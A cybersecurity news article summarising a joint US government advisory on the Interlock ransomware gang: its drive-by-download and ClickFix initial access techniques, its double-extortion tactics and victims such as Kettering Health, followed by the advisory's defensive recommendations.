The US government has warned businesses and critical infrastructure organizations to stay vigilant against wide-ranging attacks from the Interlock ransomware gang.
The joint advisory from four government agencies including the FBI and the Department of Health and Human Services (HHS), highlighted the novel initial access techniques used by the cybercrime group.
This includes “drive-by-download” and ClickFix social engineering techniques.
The group, first identified in late September 2024, has been observed targeting various business, critical infrastructure and other organizations in North America and Europe.
High-profile incidents attributed to Interlock in 2025 include Kettering Health, a major healthcare provider in western Ohio, US, and Scottish local authority West Lothian council.
Its favored tactic is double extortion, in which threat actors exfiltrate data as well as encrypt it, increasing the pressure on victims to pay a ransom demand.
The ransomware encryptors deployed are designed for both Windows and Linux operating systems.
“These actors are opportunistic and financially motivated in nature and employ tactics to infiltrate and disrupt the victim’s ability to provide their essential services,” the advisory, published on July 22, warned.
“Uncommon” Method for Initial Access
The FBI has observed Interlock using a technique called drive-by-download to obtain initial access, which was described as an “uncommon method among ransomware groups.”
This technique involves the compromise of legitimate websites, which automatically installs malware onto the victim’s device upon being visited.
Interlock actors have also used the ClickFix social engineering technique to gain initial access. This tactic involves the use of a fake error or verification message to manipulate victims into copying and pasting a malicious script and then running it.
Post-compromise, affiliates deploy various methods for discovery, credential access and lateral movement.
A PowerShell script executes a series of commands designed to gather information on victim machines.
Once command and control (C2) is established, a series of PowerShell commands are used to download a credential stealer and keylogger binary. These tools collect various information to help facilitate access between systems, including login information and users’ keystrokes.
Remote desktop protocol (RDP) is also leveraged to facilitate lateral movement.
Data is then exfiltrated via AzCopy, a legitimate tool used to copy files, and various file transfer tools, including WinSCP.
Following exfiltration, Interlock launches ransomware encryptors.
Encrypted files are appended with a ransom note titled !__README__!.txt. Interlock affiliates do not leave an initial ransom demand or payment instructions in this note, instead each victim is provided with a unique code and instructions to contact the ransomware actors via a .onion URL.
When contact is made, victims are instructed to make ransom payments in Bitcoin to cryptocurrency wallet addresses provided by the actors.
The actors also threaten to publish the victim’s exfiltrated data to their leak site on the Tor network unless the victim pays the ransom demand.
“The actors have previously followed through on this threat,” the agencies noted.
Read now: Interlock Ransomware Unleashes New RAT in Widespread Campaign
How to Defend Against Interlock Attacks
The advisory set out a range of recommendations for organizations to protect against the techniques used by Interlock. These include:
- Reduce the risk of drive-by-download by implementing domain name system (DNS) to block users from accessing malicious sites
- Implement web access firewalls to mitigate and prevent unknown commands or process injection from malicious domains or websites
- Implement additional email security measures, including disabling hyperlinks in received emails
- Require all accounts with passwords to comply with National Institute of Standards and Technology (NIST) password guidance and implement multi-factor authentication (MFA) for all services
- Filter network traffic by preventing unknown or untrusted origins from accessing remote services on internal systems
- Maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented and secure location
- Segment networks to prevent the spread of ransomware
